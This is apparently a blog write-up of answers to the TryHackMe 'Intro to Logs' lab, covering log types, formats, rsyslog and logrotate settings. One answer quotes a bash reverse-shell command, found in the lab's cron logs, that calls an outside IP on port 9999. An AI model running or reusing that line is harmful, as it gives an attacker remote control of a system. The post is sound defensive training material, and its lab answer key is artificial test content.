Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the ultimate-blocks domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/margheri/public_html/wp-includes/functions.php on line 6121

Notice: _load_textdomain_just_in_time işlevi yanlış çağrıldı. Translation loading for the perfect-portfolio domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Ayrıntılı bilgi almak için lütfen WordPress hata ayıklama bölümüne bakın. (Bu ileti 6.7.0 sürümünde eklendi.) in /home/margheri/public_html/wp-includes/functions.php on line 6121
Tryhackme: Intro to Logs Writeup - Aleyna Doğan

Aleyna

Cyber Security

Tryhackme: Intro to Logs Writeup

updated on

Learn the fundamentals of logging, data sources, collection methods and principles to step into the log analysis world.

Lab link.

Task 2: Expanding Perspectives: Logs as Evidence of Historical Activity

2.1. What is the name of your colleague who left a note on your Desktop?

Perry

2.2. What is the full path to the suggested log file for initial investigation?

/var/log/gitlab/nginx/access.log

Task 3: Types, Formats, and Standards

3.1. Based on the list of log types in this task, what log type is used by the log file specified in the note from Task 2?

Web Server Log

3.2. Based on the list of log formats in this task, what log format is used by the log file specified in the note from Task 2?

Combined

Task 4: Collection, Management, and Centralisation

You can check if rsyslog is installed:

To create the configuration file:

Save and Close the Configuration File. Apply the changes by restarting rsyslog with the command:

4.1. After configuring rsyslog for sshd, what username repeatedly appears in the sshd logs at /var/log/websrv-02/rsyslog_sshd.log, indicating failed login attempts or brute forcing?

stansimon

4.2. What is the IP address of SIEM-02 based on the rsyslog configuration file /etc/rsyslog.d/99-websrv-02-cron.conf, which is used to monitor cron messages?

10.10.10.101

4.3. Based on the generated logs in /var/log/websrv-02/rsyslog_cron.log, what command is being executed by the root user?

/bin/bash -c “/bin/bash -i >& /dev/tcp/34.253.159.159/9999 0>&1”

Task 5: Storage, Retention, and Deletion

5.1. Based on the logrotate configuration /etc/logrotate.d/99-websrv-02_cron.conf, how many versions of old compressed log file copies will be kept?

24

5.2. Based on the logrotate configuration /etc/logrotate.d/99-websrv-02_cron.conf, what is the log rotation frequency?

hourly

Task 6: Hands-on Exercise: Log analysis process, tools, and techniques

6.1. Upon accessing the log viewer URL for unparsed raw log files, what error does “/var/log/websrv-02/rsyslog_cron.log” show when selecting the different filters?

No date field

6.2. What is the process of standardising parsed data into a more easily readable and query-able format?

Normalisation

6.3. What is the process of consolidating normalised logs to enhance the analysis of activities related to a specific IP address?

Enrichment

Tags :

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir